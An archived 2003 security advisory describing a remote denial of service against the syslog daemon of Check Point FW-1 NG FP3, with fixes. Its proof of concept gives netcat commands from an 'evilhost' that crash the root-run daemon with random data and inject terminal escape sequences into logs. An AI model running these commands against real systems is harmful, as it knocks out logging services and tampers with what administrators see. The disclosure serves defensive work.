Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Unix :: General :: a6087.htm

Check Point DoS attack against syslog daemon

22th Mar 2003 [SBWID-6087]

	Check Point DoS attack against syslog daemon


	Check Point FW-1 NG FP3 & FP3 HF1


	Thanks to Peter of (P) &  (C)  2003  AERAsec  Network  Services  and
	Security GmbH, advisory :
	* Successful DoS from remote against syslog daemon of Check  Point  FW-1
	NG FP3 (also FP3 HF1), perhaps remote root exploit possible.
	* Syslog message containing escape sequences directed to  syslog  daemon
	of Check Point FW-1 NG FP3 (including HF1  and  HF2)  remain  unfiltered
	and cause strange output behaviour if the log is viewed on console.
	Check Point VPN-1/FW-1 NG FP3 contains a syslog  daemon  (default:  off)
	to redirect incoming syslog  messages  from  remote  (e.g.  routers)  to
	Check Point's SmartTracker logging mechanism. This syslog daemon can  be
	crashed from remote and it will not start again  auotmatically.  Neither
	a watchdog service is detecting the crash nor an entry in the  SmartView
	Tracker about a no longer available syslog daemon appears.
	Additionally it will print all chars received in a syslog  message  from
	remote without any modifications. This means, escape sequences  are  not
	filtered or e.g. expanded to their octal values in ASCII.
	 Proof of concept
	Start syslog  daemon  by  enabling  in  the  firewall  object  (and  run
	cpstop/cpstart afterwards) or by hand executing:
	[firewall]# /opt/CPfw1-50-03/bin/syslog 514 all
	Shutting down kernel logger:                               [  OK  ]
	Shutting down system logger:                               [  OK  ]
	Starting system logger:                                    [  OK  ]
	Starting kernel logger:                                    [  OK  ]
	Segmentation fault <- caused after receiving random  syslog  payload,
	see below
	Check for listening syslog daemon:
	 [firewall]# netstat -lnptu |grep -w 514
	 udp     0    0*    $pid/syslog
	Note also that this daemon is running as "root":
	 # ps -ux | grep -w syslog
	 root      $pid  0.0  6.8 148064 8612 ?       S    12:17   0:00 syslog 514 all
	Send a valid syslog message from  a  remote  host  (here  also  a  Linux
	 [evilhost]# echo  "<189>19: 00:01:04: Test" | nc -u firewall 514
	Send random payload via syslog message from a remote host:
	 [evilhost]# cat /dev/urandom | nc -u firewall 514
	The previous started syslog daemon should crash after  short  time,  use
	"netstat" to see whether a daemon is still listening on UDP port 514
	Note: for a clean restart of Check Point's syslog  daemon  the  firewall
	service needs to be restarted.
	Enable receiving of syslog from  remote  by  FW-1  like  e.g.  described
	View log on console by running following command:
	 [firewall]# fw lot -nfnl
	Send some special escape sequences via syslog, e.g.
	[evilhost]# echo -e "<189>19: 00:01:04:Test\a\033[2J\033[2;5m\033[1;31mHACKER~ATTACK\033[2;25m\033[22;30m\033[3q" | nc -u firewall 514
	Take a look at the console again, but  don't  be  scared  too  much  for
	now... Press CTRL-C and reset the console to standard by executing:
	 [firewall]# reset
	Attackers might send a lot of "special" escape sequences, for  Linux  as
	destination see "man console_codes" for more.
	Note: standard syslog daemon on a RHL 7.3 system treats code  like  this
	as shown here:
	Mar 14 13:29:30 linuxbox 19: 00:01:04: Test^G^[[2J^[[2;5m^[[1;31mHACKER ATTACK ^[[2;25m^[[22;30m^[[3q


	Solutions to prevent the successful DoS attack against syslog service:
	- Upgrade to FP3 HF2 as soon  as  possible,  see  for  more  information
	(available since 14 March 2003) : 
	- Customize your ruleset and accept syslog messages only from  dedicated
	(and trusted, see below) senders by the enforcement module
	Solutions to prevent unfiltered console output:
	- Filter log output by using "tr" like:
	 [firewall]# fw log -tfnl | tr '\000-\011\013-\037\200-\377' '*'
	(all chars with ASCII codes from from decimal 0-31  and  128-255  except
	10 for LF are replaced by a '*')
	- Update Check Point's syslog daemon to newer version once  again,  when
	available :
	- Improve ruleset like suggested above.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH